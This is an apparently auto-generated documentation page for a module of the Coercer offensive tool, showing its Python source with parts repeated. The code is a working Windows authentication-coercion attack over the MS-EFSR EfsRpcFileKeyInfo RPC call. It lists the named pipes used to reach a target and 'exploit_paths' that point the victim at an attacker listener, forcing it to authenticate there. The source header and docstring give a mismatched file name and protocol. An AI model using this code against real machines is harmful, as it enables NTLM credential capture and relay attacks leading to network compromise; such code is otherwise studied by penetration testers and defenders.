coercer.methods.MS_EFSR.EfsRpcFileKeyInfo
1#!/usr/bin/env python3 2# -*- coding: utf-8 -*- 3# File name : EfsRpcOpenFileRaw.py 4# Author : Podalirius (@podalirius_) 5# Date created : 16 Sep 2022 6 7 8from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL 9from coercer.network.DCERPCSessionError import DCERPCSessionError 10from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT 11from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, LONG, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR, GUID 12 13 14class _EfsRpcFileKeyInfo(NDRCALL): 15 """ 16 Structure to make the RPC call to EfsRpcFileKeyInfo() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31) 17 """ 18 opnum = 12 19 structure = ( 20 ('FileName', WSTR), # Type: wchar_t * 21 ('InfoClass', DWORD) # Type: DWORD 22 ) 23 24 25class _EfsRpcFileKeyInfoResponse(NDRCALL): 26 """ 27 Structure to parse the response of the RPC call to EfsRpcFileKeyInfo() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31) 28 """ 29 structure = () 30 31 32class EfsRpcFileKeyInfo(MSPROTOCOLRPCCALL): 33 """ 34 Coercing a machine to authenticate using function EfsRpcFileKeyInfo (opnum 12) of [MS-FSRVP Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fsrvp/dae107ec-8198-4778-a950-faa7edad125b) 35 36 Method found by: 37 - [@topotam77](https://twitter.com/topotam77) 38 """ 39 40 exploit_paths = [ 41 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), 42 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), 43 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), 44 ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'), 45 ] 46 47 access = { 48 "ncan_np": [ 49 { 50 "namedpipe": r"\PIPE\efsrpc", 51 "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d", 52 "version": "1.0" 53 }, 54 { 55 "namedpipe": r"\PIPE\lsarpc", 56 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 57 "version": "1.0" 58 }, 59 { 60 "namedpipe": r"\PIPE\samr", 61 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 62 "version": "1.0" 63 }, 64 { 65 "namedpipe": r"\PIPE\lsass", 66 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 67 "version": "1.0" 68 }, 69 { 70 "namedpipe": r"\PIPE\netlogon", 71 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 72 "version": "1.0" 73 }, 74 ], 75 "ncacn_ip_tcp": [ 76 { 77 "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d", 78 "version": "1.0" 79 }, 80 { 81 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 82 "version": "1.0" 83 } 84 ] 85 } 86 87 protocol = { 88 "longname": "[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol", 89 "shortname": "MS-EFSR" 90 } 91 92 function = { 93 "name": "EfsRpcFileKeyInfo", 94 "opnum": 12, 95 "vulnerable_arguments": ["FileName"] 96 } 97 98 def trigger(self, dcerpc_session, target): 99 if dcerpc_session is not None: 100 try: 101 request = _EfsRpcFileKeyInfo() 102 request['FileName'] = self.path 103 request['InfoClass'] = 0 104 resp = dcerpc_session.request(request) 105 return "" 106 except Exception as err: 107 return err 108 else: 109 print("[!] Error: dce is None, you must call connect() first.") 110 return None
33class EfsRpcFileKeyInfo(MSPROTOCOLRPCCALL): 34 """ 35 Coercing a machine to authenticate using function EfsRpcFileKeyInfo (opnum 12) of [MS-FSRVP Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fsrvp/dae107ec-8198-4778-a950-faa7edad125b) 36 37 Method found by: 38 - [@topotam77](https://twitter.com/topotam77) 39 """ 40 41 exploit_paths = [ 42 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), 43 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), 44 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), 45 ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'), 46 ] 47 48 access = { 49 "ncan_np": [ 50 { 51 "namedpipe": r"\PIPE\efsrpc", 52 "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d", 53 "version": "1.0" 54 }, 55 { 56 "namedpipe": r"\PIPE\lsarpc", 57 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 58 "version": "1.0" 59 }, 60 { 61 "namedpipe": r"\PIPE\samr", 62 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 63 "version": "1.0" 64 }, 65 { 66 "namedpipe": r"\PIPE\lsass", 67 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 68 "version": "1.0" 69 }, 70 { 71 "namedpipe": r"\PIPE\netlogon", 72 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 73 "version": "1.0" 74 }, 75 ], 76 "ncacn_ip_tcp": [ 77 { 78 "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d", 79 "version": "1.0" 80 }, 81 { 82 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 83 "version": "1.0" 84 } 85 ] 86 } 87 88 protocol = { 89 "longname": "[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol", 90 "shortname": "MS-EFSR" 91 } 92 93 function = { 94 "name": "EfsRpcFileKeyInfo", 95 "opnum": 12, 96 "vulnerable_arguments": ["FileName"] 97 } 98 99 def trigger(self, dcerpc_session, target): 100 if dcerpc_session is not None: 101 try: 102 request = _EfsRpcFileKeyInfo() 103 request['FileName'] = self.path 104 request['InfoClass'] = 0 105 resp = dcerpc_session.request(request) 106 return "" 107 except Exception as err: 108 return err 109 else: 110 print("[!] Error: dce is None, you must call connect() first.") 111 return None
Coercing a machine to authenticate using function EfsRpcFileKeyInfo (opnum 12) of MS-FSRVP Protocol
Method found by:
exploit_paths =
[('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), ('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), ('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), ('http', '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00')]
access =
{'ncan_np': [{'namedpipe': '\\PIPE\\efsrpc', 'uuid': 'df1941c5-fe89-4e79-bf10-463657acf44d', 'version': '1.0'}, {'namedpipe': '\\PIPE\\lsarpc', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\samr', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\lsass', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\netlogon', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}], 'ncacn_ip_tcp': [{'uuid': 'df1941c5-fe89-4e79-bf10-463657acf44d', 'version': '1.0'}, {'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}]}
protocol =
{'longname': '[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol', 'shortname': 'MS-EFSR'}
def
trigger(self, dcerpc_session, target):
99 def trigger(self, dcerpc_session, target): 100 if dcerpc_session is not None: 101 try: 102 request = _EfsRpcFileKeyInfo() 103 request['FileName'] = self.path 104 request['InfoClass'] = 0 105 resp = dcerpc_session.request(request) 106 return "" 107 except Exception as err: 108 return err 109 else: 110 print("[!] Error: dce is None, you must call connect() first.") 111 return None